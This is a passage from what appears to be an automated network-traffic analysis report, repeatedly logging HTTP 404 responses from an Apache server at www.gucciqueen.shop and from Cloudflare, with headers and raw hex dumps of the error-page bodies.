28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 
74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:11 GMTServer: ApacheLast-Modified: Thu, 17 Oct 2024 16:54:13 GMTETag: "49d-624af093dd2da"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 
74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:14 GMTServer: ApacheLast-Modified: Thu, 17 Oct 2024 16:54:13 GMTETag: "49d-624af093dd2da"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 
74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:17 GMTServer: ApacheLast-Modified: Thu, 17 Oct 2024 16:54:13 GMTETag: "49d-624af093dd2da"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 
74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:37 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:39 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:42 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:44 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:08:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxe%2F10JfOoGGwnXQ19PXDAGVUEVm5cBOD6Ls3e%2BooDz2AQt72o6MN%2F1ob2m4tZMrp2ghE%2FEMzQ0yaRW5IhawKz5vZg2b5iZzbi1g7JXuKbQhEDw363ehQl8s%2BjX2SBbRLaz9%2FgslMmY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d67a76f797e6b7c-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=730&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:08:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FMM6sQvfXcj%2B9BmkKTSFdZ7yx3VdOAg1RQLOrqQGmsBJujpvvq6UFreUwNkeEpDGdP29RLJIgLiC%2FZQNbTdCG1KQmmKCU%2F2wKkeawU27BN1TvHp8BDrCIUVt9fSiW%2BCCudcAzrT%2Bwi0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d67a77f7fb12e66-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1322&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=750&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 65 62 0d 0a 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: febTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:08:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2FL46wwhSTWrH3QNUJLXHXLbAU5CvzW9KthIEa9MWQ0GE9JC6dqbO70UXYkVseSAa5KGUZsYPgtIADoRZtpL9gZmNzv18ZaIDm%2FG3xu5pgIpbTYMbZs5zXSeols4yIo4PFD2l09nPVI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d67a7932bee4870-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10832&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 